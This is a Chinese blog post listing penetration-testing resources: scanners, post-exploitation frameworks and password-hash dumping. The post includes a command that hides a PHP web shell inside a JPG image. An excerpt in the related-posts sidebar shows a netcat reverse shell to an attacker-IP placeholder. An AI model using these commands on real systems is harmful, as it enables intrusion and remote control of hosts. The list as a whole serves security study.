[持续更新]工具集

最新推荐文章于 2022-05-31 17:56:34 发布
最新推荐文章于 2022-05-31 17:56:34 发布
阅读量102 收藏
点赞数
分类专栏: 渗透测试 文章标签: javascript ViewUI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_16188/article/details/82605680
版权
[Javascript Deobfuscation Tools Redux]
[url]http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/[/url]

[14 Best Open Source Web Application Vulnerability Scanners]
[url]http://resources.infosecinstitute.com/14-popular-web-application-vulnerability-scanners/[/url]

Rootkit Detection: Tuluka – [url]www.tuluka.org[/url]

Netscape格式cookie生成在线工具(w3af有时使用Netscap格式cookie):[url]http://crdx.org/misc/cookies/[/url]

web扫描:http://resources.infosecinstitute.com/vulnerability-scanners/
[table]
|Websecurify|
|Net Sparker Community Edition.|
|WSSA|
|NStalker|
|W3af|
|arachni|
|Acunetix|
[/table]

[b]后渗透工具:[/b]
https://github.com/HarmJ0y/PowerUp
https://www.veil-framework.com/veil-powerview/
https://github.com/mattifestation/PowerSploit


Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp\htdocs\images\2.jpg

[b]dump windows密码hash[/b]
http://www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7

[b]web[/b]
[url]https://w3dt.net/[/url]
httprecon [url]http://www.computec.ch/projekte/httprecon/[/url]

默认密码查询:[url]https://cirt.net/passwords[/url]

工具集http://resources.infosecinstitute.com/top-links-tools-compilation-pentesting-forensics-security-hacking/
iteye_16188
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf工具整理-持续更新
dark的博客
07-15 1万+
声明:作者整理的ctf工具仅为学习,如有侵权请联系作者删除博文,谢谢! 目录 1. 通用工具 2. web工具 3. 离线解码工具 4. 在线解码工具 5. 杂项工具 6. 逆向工具 1. 通用工具 1.1 网络抓包工具:Wireshark 1.2 攻击web 应用程序的集成平台:BurpUnlimited 2. web工具 2.1 后台扫描工具:御剑后台扫描珍藏版 2.2 浏览器插件:HackBar 用来进行sql注入以及xss测试或进行各种编码功能 2.3 目录/文件和DNS爆破.
工具集(长期更新
liuyongshun2的博客
12-08 717
同步和备份工作中非常重要 一、软件和工具 1、浏览器  推荐:   1、 firefox :火狐浏览器,推荐这里下载 右下角切换语言。   2、google :谷歌之所以放第二是因为被和谐了,开发者必备。   3、搜狗 : 这家伙启动还是很快的。  使用:(firefox) 书签: 书签栏合理分类 注册帐号,同步自己电脑和工作电脑收藏的书签,firefox的帐号一个本
httprecon-7.3new.zip
12-11
该工具是web server的fingerprint,类似httprint,用来识别web服务器。作为开源软件,现在更新到7.3版。该工具可能成为一项需求脆弱性分析(例如准备开发的产品有关的漏洞)。主要解决报运行时错误 62
httprecon-7.3.zip
07-26
一直以来,Web服务器识别都是使用httprint来进行扫描,现在多了一个选择了,而且还是开源的。 The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis. Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easyness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting. Some of them were already discussed in the book Die Kunst des Penetration Testing (Chapter 9.3, HTTP-Fingerprinting, pp. 530-550).
Httprecon 使用说明
学习网络技术
08-02 3562
该工具是web server的fingerprint,类似httprint,用来识别web服务器。作为开源软件,现在更新到7.3版。该工具可能成为一项需求脆弱性分析(例如准备开发的产品有关的漏洞)。一个先进的指纹识别软件就像httprecon不依赖于简单的旗帜的公告分析软件。管理员或用户可以改变服务器的字符串,所以枚举将生成一个错误的结果。相反httprecon正在做的分析软件的特点是能够识别的行
工具集持续更新
鑫鑫缺点金的博客
05-31 1705
工具付费软件SensorDump开源软件 付费软件 Sensor 调试工具: 普通:可以查看硬件信息,sensor上报数据,方便bring up 1.Sensor list APK 华为:华为的调试工具,功能多了log输出,宏定义等 2.Sensor list APK Dump Dump-解析工具: MTK-Dump-解析 开源软件 ..............................
好用的工具记录(持续更新..
u010756303的专栏
07-26 557
maven Helper: 用于查看maven依赖 SequenceDiagram: 用于查看类的时序图,需要在源代码环境查看,不能在类包查看 Database Navigator: 数据库管理工具
X工具库合集,以后持续更新,有问题或者建议可以联系!
最新发布
01-06
帮你解决一些问题,附源码,有问题或者建议可以联系!
VS平台工具集.zip
05-16
"VS平台工具集.zip"文件显然是为了扩展或更新VS的工具集,以提升开发者的效率。在安装这个压缩包时,我们需要注意将解压内容放置在指定的位置,即C盘的"Program Files (x86)\MSBuild"目录下。MSBuild是Visual Studio...
MSBuild VS平台工具集12.14.15.7z
11-17
在“MSBuild VS平台工具集12.14.15.7z”这个压缩包中,我们看到它包含了不同版本的MSBuild工具集,具体版本为12、14和15。这些版本对应的是Visual Studio的不同发行版,如VS2013(版本12)、VS2015(版本14)以及VS...
DevOps与持续交付的九大最佳测试工具
03-23
在整个应用程序开发的生命周期中,DevOps是一套强调协作、沟通和自动化的实践集。而持续交付(ContinuousDelivery)则允许团队一旦完成了持续测试后,就能及时地发布出新的版本。 在整个应用程序开发的生命周期中,...
[译]nmap绕过防火墙
iteye_16188的博客
10-17 4916
原文地址:http://resources.infosecinstitute.com/nmap-evade-firewall-scripting/ [color=blue]TCP ACK Scan (-sA)[/color] 发送ACK数据报比发送SYN数据包更好,因为如果远端主机存在主动防火墙,那么由于防火墙对于ACK数据报不产生log,因为防火墙把ACK数据包当成SYN数据包的应答。TCP...
arachni手册
iteye_16188的博客
10-30 1373
[b]快速开始[/b] [b]帮助[/b] 使用-h来查看arachni功能 arachni -h 当扫描进行时,可以使用回车键来暂停/恢复,中断,延缓执行,以及查看一个发现的问题的总结。 可以这样运行arachni: [code="java"]arachni http://test.com[/code] 将会加载所有的checks,在/plugins/defaults下的插件,审计...
[译]解密MSSQL密码
iteye_16188的博客
03-26 1093
原文地址: [url]https://blog.netspi.com/decrypting-mssql-database-link-server-passwords/[/url] [url]https://blog.netspi.com/decrypting-mssql-credential-passwords/[/url] (一)Linked Servers MSSQL在数据库中hash...
netcat反弹shell
iteye_16188的博客
09-01 741
注意:如果想要在小于1024的端口做监听,那么需要root权限 一)通用场合 1. 自己机器:nc —nvlp 443 2. 目标机:nc attacker'sIP 443 —e /bin/bash -n:不解析域名 -v:显示连接信息 -l:处于监听状态 -p:端口号(有时需要单独把-p选项拿出来) 二)如果不支持-e选项:如果代码编译的时候没有指定GAPING_SECURITY_...
the-backdoor-factory
iteye_16188的博客
11-27 727
参考:[url]https://github.com/secretsquirrel/the-backdoor-factory[/url] 貌似很有趣,值得深入了解了解 :wink: [b]安装过程[/b] [code="java"]1. easy_install wget "https://pypi.python.org/packages/source/e/ez_setup/ez_set...
[译]使用sql创建后门
iteye_16188的博客
10-10 727
原文地址:http://resources.infosecinstitute.com/backdoor-sql-injection/ 在读本文之前应该参考http://resources.infosecinstitute.com/blind-sql-injection/ 本文的目的是通过sql注入漏洞来执行任意命令。为了运行OS命令,我们需要有一个命令行shell(CMD),或者运行允许我...
百度研发工具集:打通持续交付的障碍
“藏经阁-百度研发工具集的应用实践.pdf”是关于百度在软件研发工具集方面的应用实践,重点在于解决研发过程中遇到的效率、质量和稳定性问题,通过一系列工具和方法提升研发流程的效率。 正文: 这篇内容主要介绍...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值